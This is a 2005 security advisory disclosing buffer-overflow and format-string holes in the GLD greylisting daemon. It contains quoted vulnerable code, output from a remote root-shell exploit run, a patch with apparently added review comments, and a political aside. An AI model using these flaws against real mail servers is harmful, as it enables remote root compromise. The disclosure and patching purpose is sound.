GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
From: "dong-hun you" <xploit@hackermail.com.>
Date: Tue, 12 Apr 2005 08:41:08 +0800
Message-Id: <20050412004111.562AC7A890E@ws4-4.us4.outblaze.com.>
========================================
INetCop Security Advisory #2005-0x82-026
========================================
Title: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
0x01. Description
About:
Gld is a standalone greylisting server for Postfix.
Greylisting is a new weapon to use against spam. For more information on
this technique, see http://www.greylisting.org.
This implementation listens on a TCP port and uses MySQL for storing data.
The server supports whitelists based on sender, sender domain and client IP.
It also supports light greylisting.
URL: http://www.gasmi.net/gld.html
Reference URL: http://www.gasmi.net/down/gld-readme
It is used in the FreeBSD ports collection and in Gentoo and Debian.
Reference URL: http://wyae.de/docs/greylisting_on_debian.php
Reference URL: http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/gld/
Reference URL: http://gentoo-portage.com/mail-filter/gld
Reference URL: http://directory.fsf.org/email/spam/gld.html
The program has plenty of remote vulnerabilities.
A remote user can use these vulnerabilities to gain root privileges.
#1) Multiple overflow vulnerabilities
This problem is caused by misuse of the strcpy() and sprintf() functions.
`/gld-1.4/server.c':
--
...
int HandleChild(int s,config *cnf)
{
  char buff[BLEN];
  char request[BLEN];
  char sender[BLEN];
  char recipient[BLEN];
  char ip[BLEN];
...
  if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
  {
    sprintf(buff,"Received invalid data req=(%s) sender=(%s) recipient=(%s) ip=(%s)",request,sender,recipient,ip); // here: four BLEN-sized fields go into one BLEN-sized buffer
    if(cnf->syslog==1) ErrorLog(cnf,buff);
    if(cnf->debug==1) printf("%d: %s\n",pid,buff);
    return(-2);
  }
...
--
The sprintf() call can be overflowed remotely, which allows an attacker to gain root privileges.
#2) Remote format string vulnerability
These vulnerabilities are very easy to exploit.
gld.conf enables logging through syslog() by default.
Because of the problem in the following code, it is therefore possible to gain root privileges.
`/gld-1.4/cnf.c':
--
...
void ErrorLog(config *conf,char *msg)
{
#ifdef HAVE_SYSLOG_H
  openlog("gld",0,conf->facility);
  syslog(LOG_ALERT,msg); // here: msg is used as the format string
  closelog();
#endif
}
...
--
It is caused by incorrect use of the syslog() function: msg is passed as the format string.
--
bash-2.04# cat *.c |grep ErrorLog |grep -v void
  if(conf.syslog==1) ErrorLog(&conf,"gld started, up and running");
  if(cid < 0 && conf.syslog==1) ErrorLog(&conf,"Fork returned error code, no child");
  ErrorLog(cnf,buff);
  if(cnf->syslog==1) ErrorLog(cnf,"Read Network error");
  if(cnf->syslog==1) ErrorLog(cnf,buff);
  if(cnf->syslog==1) ErrorLog(cnf,"MySQL error");
bash-2.04#
--
It can be exploited pretty easily.
There are also many more sprintf() and strcpy() overflow vulnerabilities that are not mentioned here.
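Added example (not part of the original advisory and not gld's own code): a bounded, constant-format version of the logging path shown in #1 and #2. The value of BLEN and the helpers copy_field(), capture_log() (a stand-in for syslog()) and scrub() are assumptions introduced for illustration; the inputs in main() are constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define BLEN 512  /* assumed size; the advisory does not show gld's definition */

/* Copy a request attribute into a fixed buffer. An over-long value is
 * rejected rather than truncated, and dst is always NUL-terminated. */
int copy_field(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0) return -1;
    if (n >= dstsz) { dst[0] = '\0'; return -1; }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Stand-in for syslog(LOG_ALERT, fmt, ...): formats into `out` so the
 * result can be inspected. Hypothetical helper, not part of gld. */
int capture_log(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Replace control characters so one field cannot forge extra log lines. */
void scrub(char *s)
{
    for (; *s; s++)
        if ((unsigned char)*s < 0x20 || *s == 0x7f) *s = '?';
}

/* Bounded counterpart of the "Received invalid data" path in HandleChild().
 * Returns 0 if the whole message was logged, 1 if it was truncated,
 * -1 on a formatting error. */
int log_invalid_request(char *out, size_t outsz, const char *request,
                        const char *sender, const char *recipient,
                        const char *ip)
{
    char msg[BLEN];
    int n = snprintf(msg, sizeof msg,
                     "Received invalid data req=(%s) sender=(%s) "
                     "recipient=(%s) ip=(%s)", request, sender, recipient, ip);
    if (n < 0) return -1;
    scrub(msg);
    /* Constant format string: msg is only ever an argument, as in the
     * patched ErrorLog(). Passing msg as the format would let "%x" or
     * "%n" inside a field be interpreted as conversions. */
    if (capture_log(out, outsz, "%s", msg) < 0) return -1;
    return ((size_t)n >= sizeof msg) ? 1 : 0;
}

int main(void)
{
    char out[BLEN], sender[BLEN], big[2 * BLEN];
    /* Constructed inputs: a field holding conversion specifiers and a
     * newline, and a field longer than the buffer. */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("copy short: %d\n", copy_field(sender, sizeof sender, "%x%x%n\nfake"));
    printf("copy long:  %d\n", copy_field(out, sizeof out, big));
    printf("log rc:     %d\n", log_invalid_request(out, sizeof out, "bad",
           sender, "rcpt@example.org", "192.0.2.1"));
    printf("logged:     %s\n", out);
    printf("log rc big: %d\n", log_invalid_request(out, sizeof out, big, "", "", ""));
    return 0;
}
```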
0x02. Vulnerable Packages
Vendor site: http://www.gasmi.net/gld.html
GLD, all versions (exploitable)
-gld-1.4.tgz
-gld.1.3.tgz
0x03. Exploit
I made this exploit on Red Hat Linux 7.x and 9.x as proof-of-concept code.
There is no plan to develop code for other platforms.
#1) remote buffer overflow exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 3 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)
# method: jmp *%esp exploit: 254 byte
# send code size: 2200 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[root@x0x /]# w
#2) remote format string exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 0 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)
# Make format string, .dtors: 0x804d14c
#
# shellcode addr: 0x805506e, size: 320 byte
# send code size: 394 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
bash: no job control in this shell
stty: standard input: Invalid argument
[root@x0x /]#
0x04. Patch
GLD 1.4 patch:
=== gld-1.4.patch ===
--- cnf.c 2004-08-18 23:44:22.000000000 +0900
+++ patch/cnf.c 2005-03-06 17:36:04.000000000 +0900
@@ -118,7 +118,7 @@
{
#ifdef HAVE_SYSLOG_H
openlog("gld",0,conf->facility);
-syslog(LOG_ALERT,msg);
+syslog(LOG_ALERT,"%s",msg);
closelog();
#endif
}
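Review bot: Log(), which server.c calls with the same network-supplied recipient, sender and ip, is not touched by this patch; it needs the same check as the syslog() line here, namely that the format argument is a constant such as "%s" and never a caller-built buffer.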
--- greylist.c 2004-08-18 04:12:38.000000000 +0900
+++ patch/greylist.c 2005-03-06 17:39:59.000000000 +0900
@@ -20,9 +20,9 @@
pid=3Dgetpid();
=20
ts=3Dtime(0);
-strcpy(oip,ip);
-strcpy(osender,sender);
-strcpy(orecipient,recipient);
+strncpy(oip,ip,sizeof(oip)-1);
+strncpy(osender,sender,sizeof(osender)-1);
+strncpy(orecipient,recipient,sizeof(orecipient)-1);
=20
if(conf->debug=3D=3D1) printf("%d: Starting the greylist algo\n",pid);
=20
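Review bot: the three strncpy() calls into oip, osender and orecipient leave the destination unterminated when the source is sizeof-1 bytes or longer, unless those buffers were zeroed earlier, which these lines do not show. Add an explicit terminator after each copy, for example oip[sizeof(oip)-1]=0;.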
@@ -52,17 +52,17 @@
if(conf->debug=3D=3D1) printf("%d: lightgrey on domain is on, let'=
s keep the domain only on recipient and sender\n",pid);
=20
domain=3D(char *)strstr(osender,"@");
- if(domain!=3DNULL) strcpy(sender,domain);
+ if(domain!=3DNULL) strncpy(sender,domain,BLEN-1);
=20
domain=3D(char *)strstr(orecipient,"@");
- if(domain!=3DNULL) strcpy(recipient,domain);
+ if(domain!=3DNULL) strncpy(recipient,domain,BLEN-1);
}
=20
//
// Do we have this entry in our database ?
//
=20
-sprintf(query,"select first from greylist where ip=3D'%s' and sender=3D'%s=
' and recipient=3D'%s'",ip,sender,recipient);
+snprintf(query,sizeof(query)-1,"select first from greylist where ip=3D'%s'=
and sender=3D'%s' and recipient=3D'%s'",ip,sender,recipient);
n=3DSQLQuery(query);
=20
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s) result=3D%ld\n",pid,query,=
n);
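Review bot: the two strncpy() calls into sender and recipient use BLEN-1 where the rest of the patch uses sizeof(), so they are only safe if every caller passes buffers of at least BLEN bytes. Pass the destination size in as a parameter or document the requirement at the function definition, and terminate the copy explicitly.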
@@ -78,7 +78,7 @@
//
if(conf->lightd=3D=3D1 && n=3D=3D0)
{
- sprintf(query,"select first from greylist where ip=3D'%s' and send=
er=3D'%s' and recipient=3D'%s'",ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"select first from greylist where i=
p=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ip,osender,orecipient);
n=3DSQLQuery(query);
if(n<0) return(-1);
if(n=3D=3D0) fneither=3D1; else fnotdomain=3D1;
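Review bot: the snprintf() return value is ignored on the lightd query line, so a query that did not fit is cut mid-statement and still passed to SQLQuery(). Compare the return value with sizeof(query) and return -1 on truncation; the -1 in sizeof(query)-1 is not needed, because snprintf() already reserves the terminating byte.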
@@ -101,7 +101,7 @@
domain=3D(char *)strstr(osender,"@");
if(domain=3D=3DNULL) domain=3Dosender;
=20
- strcpy(netw,oip);
+ strncpy(netw,oip,sizeof(netw)-1);
l=3Dstrlen(netw);
for(i=3Dl-1;i>=3D0;i--)
if(netw[i]=3D=3D'.')
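Review bot: strlen(netw) on the line after the new strncpy() reads past the end of netw if oip filled it completely, because strncpy() adds no terminator in that case. Set netw[sizeof(netw)-1]=0 before the strlen() call.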
@@ -111,7 +111,7 @@
}
=20
=20
- sprintf(query,"select count(mail) from whitelist where mail in ('%=
s','%s','%s','%s')",osender,domain,oip,netw);
+ snprintf(query,sizeof(query)-1,"select count(mail) from whitelist =
where mail in ('%s','%s','%s','%s')",osender,domain,oip,netw);
n=3DSQLQuery(query);
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s) result=3D%ld\n",pid,query=
,n);
if(n>0)
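Review bot: osender and domain still reach the whitelist query inside quoted '%s' placeholders with no escaping visible in this hunk, and the result (n>0) decides whether the sender is whitelisted. Bounding the length does not address that; escape the values before formatting, for example with mysql_real_escape_string(), or use a prepared statement.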
@@ -130,7 +130,7 @@
x=3Dsscanf(oip,"%d.%d.%d.%d",&a,&b,&c,&d);
if(x=3D=3D4)
{
- sprintf(query,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
+ snprintf(query,sizeof(query)-1,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
n=3DDnsIp(query,NULL);
if(conf->debug=3D=3D1) printf("%d: DNSQuery=3D(%s) result=3D%ld\n",pid,=
query,n);
if(n=3D=3D0)
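Review bot: the sscanf() above the changed line accepts any integers for a, b, c and d, so values outside 0 to 255 end up in the DNS whitelist name. Range-check the four octets before building the query name.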
@@ -146,9 +146,9 @@
// was not whitelisted and thus we have to insert it
//
if(conf->lightd=3D=3D1 && fneither=3D=3D1)
- sprintf(query,"insert into greylist values('%s','%s','%s',=
%d,%d,1)",ip,osender,orecipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist value=
s('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
=20
- else sprintf(query,"insert into greylist values('%s','%s','%s',%d,%d,=
1)",ip,sender,recipient,ts,ts);
+ else snprintf(query,sizeof(query)-1,"insert into greylist values('%s'=
,'%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
=20
SQLQuery(query);
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s)\n",pid,query);
@@ -165,9 +165,9 @@
if(conf->update=3D=3D1)
{
if(conf->lightd=3D=3D1 && fnotdomain=3D=3D1)
- sprintf(query,"update greylist set last=3D%d,n=3Dn+1 where ip=3D=
'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,osender,orecipient);
+ snprintf(query,sizeof(query)-1,"update greylist set last=3D%d,n=
=3Dn+1 where ip=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,osende=
r,orecipient);
=20
- else sprintf(query,"update greylist set last=3D%d,n=3Dn+1 where i=
p=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,sender,recipient);
+ else snprintf(query,sizeof(query)-1,"update greylist set last=3D%=
d,n=3Dn+1 where ip=3D'%s' and sender=3D'%s' and recipient=3D'%s'",ts,ip,sen=
der,recipient);
=20
SQLQuery(query);
if(conf->debug=3D=3D1) printf("%d: Query=3D(%s)\n",pid,query);
@@ -180,7 +180,7 @@
=20
if(ts-n>conf->mini && conf->lightd=3D=3D1 && fnotdomain=3D=3D1)
{
- sprintf(query,"insert into greylist values('%s','%s','%s',%d,%d,1)",ip,s=
ender,recipient,ts,ts);
+ snprintf(query,sizeof(query)-1,"insert into greylist values('%s','%s','%=
s',%d,%d,1)",ip,sender,recipient,ts,ts);
if(conf->debug=3D=3D1) printf("Add the domain triplet for next time.\n");
SQLQuery(query);
}
--- server.c 2004-08-19 07:57:03.000000000 +0900
+++ patch/server.c 2005-03-06 17:41:52.000000000 +0900
@@ -215,7 +215,7 @@
if(cnf->debug=3D=3D1) printf("%d: Rejected New incoming connexion from %s=
(%s)\n",pid,buff,ip);
if(cnf->syslog=3D=3D1)
{
- sprintf(buff,"Rejected New incoming connexion from %s (%s)\n",buff,ip);
+ snprintf(buff,sizeof(buff)-1,"Rejected New incoming connexion from %s (%=
s)\n",buff,ip);
ErrorLog(cnf,buff);
}
=20
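Review bot: the new snprintf() call still passes buff as both the destination and a %s argument, which is undefined behaviour for overlapping objects. Format into a separate local buffer and hand that to ErrorLog().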
@@ -262,16 +262,16 @@
if(strcmp(buff,"")=3D=3D0) break;
=20
if(strncmp(buff,"request=3D",8)=3D=3D0)
- strcpy(request,buff+8);
+ strncpy(request,buff+8,sizeof(request)-1);
=20
if(strncmp(buff,"sender=3D",7)=3D=3D0)
- strcpy(sender,buff+7);
+ strncpy(sender,buff+7,sizeof(sender)-1);
=20
if(strncmp(buff,"recipient=3D",10)=3D=3D0)
- strcpy(recipient,buff+10);
+ strncpy(recipient,buff+10,sizeof(recipient)-1);
=20
if(strncmp(buff,"client_address=3D",15)=3D=3D0)
- strcpy(ip,buff+15);
+ strncpy(ip,buff+15,sizeof(ip)-1);
=20
}
=20
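Review bot: the four strncpy() calls silently truncate an over-long request, sender, recipient or client_address, so the greylist decision is made on a different value from the one that was sent, and they leave the field unterminated unless it was cleared beforehand. Reject the request when the value does not fit the destination, and terminate each field explicitly.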
@@ -300,7 +300,7 @@
=20
if(strcmp(request,REQ)!=3D0 || recipient[0]=3D=3D0 || ip[0]=3D=3D0)
{
- sprintf(buff,"Received invalid data req=3D(%s) sender=3D(%s) recipient=3D=
(%s) ip=3D(%s)",request,sender,recipient,ip);
+ snprintf(buff,sizeof(buff)-1,"Received invalid data req=3D(%s) sender=3D(=
%s) recipient=3D(%s) ip=3D(%s)",request,sender,recipient,ip);
if(cnf->syslog=3D=3D1) ErrorLog(cnf,buff);
if(cnf->debug=3D=3D1) printf("%d: %s\n",pid,buff);
return(-2);
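Review bot: request, sender, recipient and ip are written to the log verbatim on the snprintf() line, so control characters in a field land in syslog unchanged. Replace non-printable bytes before calling ErrorLog(); this line is also only safe together with the cnf.c hunk that makes ErrorLog() use a "%s" format.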
@@ -322,7 +322,7 @@
=20
if(n=3D=3D0)
{
- sprintf(buff,"action=3Ddefer_if_permit %s\n\n",cnf->message);
+ snprintf(buff,sizeof(buff)-1,"action=3Ddefer_if_permit %s\n\n",cnf->messa=
ge);
WriteSocket(s,buff,strlen(buff),TOUT);
if(cnf->syslog=3D=3D1) Log(cnf,recipient,sender,ip,MSGGREYLIST);
if(cnf->debug=3D=3D1) printf("%d: Decision is to greylist\n",pid);
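Review bot: if cnf->message is long enough to truncate the snprintf() output, the trailing "\n\n" is lost and WriteSocket() sends a reply without its terminating blank line. Check the return value against sizeof(buff), or build the reply so the terminator is appended separately.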
=== eof ===
P.S.: Sorry for my poor English.
--
These days, the main issue that strikes Korea is the small rocky island "Dokdo".
You can get more detailed information from the following websites.
"The Japanese government has to follow and learn from the German government"
I can confidently say "Dokdo belongs to Korea".
(1) reference
1) Their claim that the East Sea has some historical precedent worked,
as some major book and map publishers, educational web sites and other
reference materials now include the East Sea name along with the Sea of Japan.
- worldatlas.com-
http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
2) On historical perspective and in international law, why there
is no valid dispute over the ownership of Dokdo.
http://www.prkorea.com/english/textbook/ge03.html
3) Truth in scholarship
http://www.prkorea.com/english/textbook/maintruth.html
--
By "dong-houn yoU" (Xpl017Elz), in INetCop Security Co., LTD.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.net
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--